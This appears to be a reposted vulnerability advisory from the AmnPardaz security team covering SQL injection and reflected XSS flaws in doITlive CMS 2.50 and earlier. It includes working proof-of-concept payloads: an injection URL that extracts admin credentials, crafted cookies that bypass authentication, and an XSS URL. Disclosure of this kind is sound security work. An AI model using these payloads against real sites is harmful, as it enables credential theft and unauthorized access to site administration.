SecurityReason - doITlive CMS <= 2.50 (SQL Injection/XSS) Multiple Vulnerabilities

Exploit Code :

########################## www.BugReport.ir
#######################################
#
# AmnPardaz Security Research Team
#
# Title: doITlive CMS <=2.50 (SQL Injection/XSS) Multiple
Vulnerabilities
# Vendor: www.doitlive.com
# Vulnerable Version: 2.50 and prior versions
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: www.bugreport.ir/?/43
########################################################################
###########

####################
1. Description:
####################
User friendly Multiple website Site dynamic control system.
Including a Content Management System for dynamic generation and
publishing of information on Internet ? Extranet - Intranet. doITlive is
an ASP powered back-end Multi-site, browser based management tool,
Supporting MS Access & MS SQL databases.

####################
2. Vulnerabilities:
####################
2.1. Injection Flaws. SQL Injection in "/default.asp" in "ID"
parameter.
2.1.1. Exploit:
Check the exploit/POC section.
2.2. Injection Flaws. SQL Injection in "/edit/default.asp" by
cookie's parameters lead to bypass authentication (in remember user
section).
2.2.1. Exploit:
Check the exploit/POC section.
2.3. Cross Site Scripting (XSS). Reflected XSS attack in
"/edit/showmedia.asp" in "File" parameter.
2.3.1. Exploit:
Check the exploit/POC section.
####################
3. Exploits/POCs:
####################
Original Exploit URL: http://bugreport.ir/index.php?/43/exploit
3.1. SQL Injection in "/default.asp" in "ID" parameter.
-------------
Find Admin's password:

http://[URL]/default.asp?action=USUB&ID=-1%20union%20select%20username%2
b'::'%2bpassword,1%20from%20w_user%20where%20username like
'%25admin%25'&TYPE=MAIL
-------------
3.2. SQL Injection in "/edit/default.asp" by cookie's parameters
lead to bypass authentication (in remember user section).
-------------
-Set these cookies:

Licence[SpecialLicenseNumber]=Username=b%21n8orijfeh7o9u28fqekyhh1jre&Pa
ssword=b%21n8orpj%28e%287%289%282sf2e%3Ey2hi%28f%28h%28opu28%3Eq2ksh%281
jre;
- In demo versions [SpecialLicenseNumber] = "" so we have:

LicenceId=Username=b%21n8orijfeh7o9u28fqekyhh1jre&Password=b%21n8orpj%28
e%287%289%282sf2e%3Ey2hi%28f%28h%28opu28%3Eq2ksh%281jre;
- Parameters used for username and password in this cookie:
Decrypt('or'1'='1'or'1'='1) =
%28rs12h%3Ek2qp8%28u%28o%28hhfyie2f%3E229s7%28e%28j%28r%288p
Decrypt(' or username like '%admin%' or username like
'%admin%)=
%28rp1%21htksqb8fumolh%21f%26ie%26jj%26e%21%26s%21vlfmofnb%21sjtf%21%28p
b%28noonhby%28effj2%219n7oefjvrs8%21
Decrypt(admin) = b%21n8orijfeh7o9u28fqekyhh1jre
Decrypt(' or username like '%admin%) =
%28%21p8%21rtjseb7f9m2lf%21e%26yehjo%26nibf%28hfoju%218nqokfhv1sr%21
-------------
3.3. Reflected XSS attack in "/edit/showmedia.asp" in "File"
parameter.
-------------
http://[URL]/edit/showmedia.asp?FILE=<Script>alert('XSS by
BugReport.IR')</script>"Bugreport.jpg
-------------

####################
4. Solution:
####################
All the source codes are encoded. So, first of all, decode the
source codes of "/default.asp","/edit/default.asp","/edit/showmedia.asp"
by Microsoft Script Decoder (scrdec.exe). Then, edit the source code to
ensure that inputs are properly sanitized (for 2.1, 2.2, 2.3).
####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com